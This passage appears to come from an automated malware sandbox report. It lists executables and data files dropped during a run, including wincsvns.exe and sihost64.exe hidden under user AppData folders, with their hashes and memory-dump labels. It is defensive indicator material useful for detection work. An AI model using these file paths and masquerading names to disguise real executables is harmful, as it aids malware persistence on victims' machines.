| SHA1 | 793a7625c0106d6cd79d060b4eec94e58530833e |
| SHA256 | f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb |
| SHA512 | 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900 |
C:\Users\Admin\tnnodes.dat
| MD5 | a2eb00e16d2d222a9b15cd0c565ad9a0 |
| SHA1 | 3a3a0658f5a0395f7b3b175d0bdb2e30a1e53414 |
| SHA256 | 1c93017a92d9c60f2687e0bf497f780440bc4626121adcac6c92c0194e5762e8 |
| SHA512 | b5c0030c3982e56203a840899242ed009054843a450eb33a31da4683d81a5f84d5a4af1ec742d786c58141df29b4289f33f326038ccc38b46f214f9e12e4e9fa |
memory/1908-474-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2314210268.exe
| MD5 | 7990f0feb5dd2934aef2d546fd782a07 |
| SHA1 | 7a10b7a22b964bd76effdbdc799098481fa72102 |
| SHA256 | 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1 |
| SHA512 | d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18 |
memory/4644-481-0x000001D5EFD60000-0x000001D5EFF80000-memory.dmp
memory/4644-483-0x000001D5D7270000-0x000001D5D7282000-memory.dmp
memory/4812-485-0x0000000000000000-mapping.dmp
memory/1784-486-0x0000000000000000-mapping.dmp
memory/4644-487-0x000001D5D5290000-0x000001D5D54B0000-memory.dmp
memory/4216-488-0x0000000000000000-mapping.dmp
memory/224-490-0x0000000000000000-mapping.dmp
C:\Users\Admin\wincsvns.exe
| MD5 | 7990f0feb5dd2934aef2d546fd782a07 |
| SHA1 | 7a10b7a22b964bd76effdbdc799098481fa72102 |
| SHA256 | 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1 |
| SHA512 | d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
| MD5 | 84f2160705ac9a032c002f966498ef74 |
| SHA1 | e9f3db2e1ad24a4f7e5c203af03bbc07235e704c |
| SHA256 | 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93 |
| SHA512 | f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57 |
memory/4076-504-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 480af431f9b7f20202cbeef81ccb9a8e |
| SHA1 | 65ef2c809b571e75809074afeae02950f3404441 |
| SHA256 | 862c961c71218944d9f0724562f487f8396d91803da4e1678ddb0042d843c64b |
| SHA512 | 23737eb0a0d2a2ffa728690ceeb3b534838cb889bd0a0b206b0147fa4cef05427c8dac3ecea5c6bf98e899f81d70d7510af9267569e3dad4e752d4aec4ff3951 |
memory/3608-509-0x000000014030F3F8-mapping.dmp
memory/2004-518-0x000001A593910000-0x000001A593916000-memory.dmp
memory/3608-523-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2004-524-0x000001A591D90000-0x000001A591D96000-memory.dmp